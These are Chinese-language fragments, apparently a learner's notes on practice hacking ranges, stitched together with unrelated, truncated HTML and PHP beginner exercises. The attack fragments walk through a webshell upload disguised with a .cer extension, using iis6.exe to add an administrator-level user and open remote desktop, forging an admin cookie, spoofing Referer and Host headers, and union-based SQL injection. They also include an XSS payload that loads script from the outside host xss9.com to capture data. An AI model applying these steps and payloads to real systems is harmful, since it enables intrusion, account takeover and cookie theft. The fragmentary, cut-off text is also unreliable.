通过第五题进入了后台找到产品管理可以修改上传文件制作了一句话木马程序，把后缀名改为cer可以上传之后用菜刀连接，但是没有权限访问C盘通过E:5\admin\Databackup\打开CMD输入命令whoima，拒绝访问输入命令iis6.exe "net user jiuwu 1234 /add"net user发现成功添加用户mstsc /admin命令，远程连接桌面120.2

用火狐浏览器打开靶场修改管理员cookie按F12，点击存储选项之前得到cookie值为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC名称修改为ADMINSESSIONIDCSTRCSDQ值修改为LBMLMBCCNPFINOANFGLPCFBC然后点击准备好了吗就可以进后台了

打开www.xss9.com 在查看代码选项中复制</tExtArEa>'"><sCRiPt sRC=https://xss9.com/qsSR></sCrIpT>插入到带主题及以下带*的条目中之后再XSS平台得到

进入后台说不允许从外部链接访问后台管理页面用谷歌浏览器，打开modify headers插件设置referer的值 http://127.0.0.1/admin123/default.asp设置host的值  127.0.0.1:8080居然可以访问了

点击新闻得到链接http://120.203.13.75:8001/shownews.asp?id=171尝试 order by 10 页面正常，order by 11显示数据错误，判断有10个字段猜测有没有admin这个表 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin弹出框显示非法字符用谷歌浏览器打开http://120.203.13.

点击查看新闻得到网址http://120.203.13.75:6815/?id=1尝试?id=1 and 1=1 页面正常，?id=1 and 1=2，页面显示不正常，判断存在注入点猜测字段数?id=1 order by 5，最后尝试?id=1 order by 2页面正常查询数据库版本and 1=2 union select 1,version()得到数据库版本5.5.53  查询数据

<!doctype html><html> <head> <meta charest="utf-8"/>  <title>登录表单</title> </head> <body> <p>管理员登录</p> <form action=&q

<?php  $sum = 0;  for($i = 1;$i<= 10000;$i++){  if($i%3==0or$i%7==0)  $sum+=$i;  }   echo $sum;?>

<!doctype html><html> <head> <mtea charset="utf-8"> <title>九五的空间</title> </head> <body background="img/"> <div><form ac

<!DOCTYPE HTML><HTML> <HEAD> <META CHARSET="UTE-8"> <TITLE>这是九五的第一个HTML文件</TITLE> </HEAD> <BODY> <H1>这是九五的第一个网页版个人简介</H1> <